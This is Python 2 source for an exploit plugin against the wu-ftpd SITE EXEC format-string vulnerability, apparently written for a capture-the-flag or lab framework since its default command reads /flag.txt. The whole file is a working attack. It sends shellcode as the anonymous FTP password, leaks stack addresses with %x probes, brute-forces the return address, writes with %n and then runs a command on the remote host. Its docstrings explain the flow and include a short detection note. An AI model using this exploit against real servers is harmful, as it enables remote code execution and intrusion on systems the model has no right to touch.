	def set_up(self):
		"""Build the EggManager (from the module-level ``shellcode``, with 390 as its second argument) that ``execute()`` later reads through ``self.eggm``."""
		self.eggm = EggManager(shellcode, 390)
class FTPFormatString(Exploit):
	"""Exploit plugin for the wu-ftpd ``SITE EXEC`` format-string bug (Python 2 code).

	Names used here but defined elsewhere in the module: ``Exploit``,
	``StringParam``, ``EggManager``, ``shellcode``, ``desc``, ``ftp``,
	``exploit``, ``ServiceDown`` and ``ExploitError``, plus the ``string``
	and ``time`` modules.  ``long`` and ``string.index``/``string.join``
	make the code Python 2 only.  ``self.log`` is never assigned in this
	class; presumably it comes from the ``Exploit`` base class.

	Lifecycle: ``set_up`` builds the egg manager, ``execute`` runs the
	attack over one FTP control connection and stores the last line read
	from the socket in ``self.res``, and ``isSuccessful`` checks that line
	for the ``RESULT`` parameter.
	"""
	# Upper bound on the number of probes sent by the return-address search
	# loop in execute() before the attack is reported as failed.
	MAX_ITERATION = 50
	
	def __init__(self):
		"""Register the exploit with the framework and declare its two string parameters.

		``RESULT`` is the marker ``isSuccessful`` looks for and ``CMD`` is
		the command written to the socket at the end of ``execute``.
		Presumably ``add_param`` exposes each parameter as an attribute of
		the same name, since ``execute``/``isSuccessful`` read ``self.CMD``
		and ``self.RESULT`` -- confirm against the Exploit base class.
		"""
		Exploit.__init__(self,'Wuftpd format string', desc)
		self.add_param(StringParam('RESULT','well done','The string that must be present in the result if the attack is successful'))
		self.add_param(StringParam('CMD','cat /flag.txt', 'The command to be executed on the remote host'))
		
		# Filled in by set_up()/execute(); res stays '' until a reply is read.
		self.eggm      = None
		self.res       = ''


	def set_up(self):
		"""Build the EggManager (module-level ``shellcode``, second argument 390) that ``execute`` reads via ``self.eggm``."""
		self.eggm = EggManager(shellcode,390)
		pass

	def execute(self):
		"""Run the attack over one FTP control connection.

		Flow, as implemented below:
		  1. connect and log in as ``anonymous``; the egg obtained from
		     ``self.eggm`` is sent as the password;
		  2. send two ``SITE EXEC`` probes made of ``%x`` specifiers and
		     parse hexadecimal values out of the replies (``reta``,
		     ``retz``, ``retb``);
		  3. send up to ``MAX_ITERATION`` further probes until the value
		     read back equals ``reta``, or give up with a warning;
		  4. send the final ``SITE EXEC`` payload, wait two seconds, write
		     ``self.CMD`` to the raw socket and keep the second line read
		     back in ``self.res`` for ``isSuccessful``.

		Raises ``ServiceDown`` when the connection fails and
		``ExploitError`` when the login exchange does not return 331/230.
		Reply parsing relies on ``string.index``, which raises
		``ValueError`` when a delimiter is absent, so an unexpected server
		reply surfaces as ``ValueError`` rather than ``ExploitError``.
		On the give-up path the method returns with ``self.res`` still
		``""``.

		Detection note: every stage is a plain-text ``SITE EXEC`` command on
		the FTP control channel carrying long runs of ``%x``/``%f``/``%d``
		specifiers, which is what a server log or a network signature sees.
		"""
		#self.eggm = EggManager(shellcode,390)
		# Reset so a failed run never reports a stale result.
		self.res = ""
		
		ftpm = ftp.FTPManager()
		
		if ftpm.connect()==False:
			raise ServiceDown()

		# --- 1. anonymous login; the egg travels as the password ---
		self.log.info("Sending login...")
		if (ftpm.send_cmd('user anonymous')==False):
			raise ExploitError('Connection error')
		self.log.debug('Banner: %s'%ftpm.welcome)
		resp = ftpm.get_ftp_response()
		self.log.debug('Received: %s'%resp)
		if ('331' in resp)==False:
			raise ExploitError('Unable to log-in')
		
		egg = self.eggm.get_egg()

		passwd = ftp.FTPCommand('pass',[egg])
		# NOTE(review): unlike the USER command above, the return value of
		# this send_cmd is not checked; a send failure is only noticed via
		# the 230 check on the reply.
		ftpm.send_cmd(passwd)
		resp = ftpm.get_ftp_response()
		self.log.debug('Received: %s'%resp)
		if ('230' in resp)==False:
			raise ExploitError('Unable to log-in')

		self.log.info("Logged in (the egg is inside)")

		# --- 2. two probes; hex values are cut out of the reply around
		# the '|' and '+' markers (string.index raises ValueError if a
		# marker is missing) ---
		ftpm.send_cmd("SITE EXEC exec %x %x %x %x +%x |%x")
		reply = ftpm.get_ftp_response()
		self.log.debug('Received: %s'%reply)
		
		temp1 = string.index(reply,"|")
		temp2 = string.index(reply,"+")
		reta = long(reply[temp1+1:string.index(reply,"\n")],16)
		retz = long(reply[temp2+1:temp1],16)

		params = []
		for i in range(89): params.append("%x")
		params.append("|%x")
		ftpm.send_cmd(ftp.FTPCommand("site exec",params))
		reply = ftpm.get_ftp_response()
		
		retb = long(reply[string.index(reply,"|")+1 : string.index(reply,"\n")],16)
		# 'add' records which branch was taken; it selects the final
		# payload variant further down.
		add = 0
		if reta == 0: 
			reta = retz
		else:
			add = 600
		reta = reta - 0x58
		retb = retb +100 -0x2569 - add;
		self.log.debug(" reta = %x\r\n retz = %x\r\n retb = %x"%(reta,retz,retb))

		# --- 3. probe loop: counter runs from 22 to 22+MAX_ITERATION-1 ---
		self.log.info(" Finding return address....")
		
		counter = 22
		# st is set on success but never read; the counter comparison after
		# the loop is what decides the outcome.
		st = 0
		while(counter<22+self.MAX_ITERATION):
			# reta is serialised little-endian via %c, one byte per field.
			params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\
			(reta & 0xff,\
			(reta & 0xff00) >> 8,\
			(reta & 0xff0000) >> 16,\
			(reta & 0xff000000) >> 24)]

			for i in range(129): 
				params.append("%f")
			for i in range(counter+1): 
				params.append("%d")
			params.append("|%x|%x")

			ftpm.send_cmd("SITE EXEC "+string.join(params,""))
			reply = ftpm.get_ftp_response()
						
			# Value between the first two '|' markers of the reply.
			temp1 = string.index(reply,"|")
			temp2 = string.index(reply,"|",temp1+1)
			val = long(reply[temp1+1 : temp2],16)
			self.log.debug("   address = %x (I'm looking for %x)"%(val,reta))
			if (val != 0):
				if (val == reta):
					st = 1
					break
			counter = counter+1
		
		# Loop exhausted without a match: give up, leaving self.res == "".
		if counter==22+self.MAX_ITERATION:
			self.log.warning("Attack failed. I cannot find the return address")
			return
			
		self.log.debug("Return address found after %d iterations"%(counter-22+1))

		# --- 4. final payload (note "%.f" here versus "%f" in the probe
		# loop, and counter rather than counter+1 "%d" fields) ---
		params = ["kkkkkkkkkkkkkkkkkkkkkkkkkkbbbb%c%c\xff%c%c"%\
		 (reta & 0xff,\
		 (reta & 0xff00) >> 8,\
		 (reta & 0xff0000) >> 16,\
		 (reta & 0xff000000) >> 24)]
		 
		for i in range(129): 
			params.append("%.f")
		for i in range(counter): 
			params.append("%d")
		# The width is chosen by the branch recorded in 'add' above.
		if(add == 600):
			params.append("|%%.%ud%%n"%(retb+9807))
		else:
			params.append("|%%.%ud%%n"%(retb+9807-480))

		ftpm.send_cmd("SITE EXEC "+string.join(params,""))
		
		self.log.info("Waiting for a shell....")
		time.sleep(2)
		
		# CMD is written straight to the socket; the first line read back is
		# only logged, the second one is kept as the result.
		self.log.info("Sending command")
		ftpm.send_raw(self.CMD+"\n")
		
		temp = ftpm.sock.readline('\n',blocking=True)
		self.log.debug('Received: %s'%temp)
		
		self.res = ftpm.sock.readline('\n',blocking=True)
		self.log.debug("Result %r"%self.res)
		
	def isSuccessful(self):
		"""Return ``exploit.RES_OK`` if the RESULT parameter is a substring of ``self.res``, else ``exploit.RES_FAIL``.

		This is a plain substring test: an empty RESULT matches any
		result, including the ``""`` left behind by a failed run.
		"""
		if self.RESULT in self.res:
			return exploit.RES_OK
		else:
			return exploit.RES_FAIL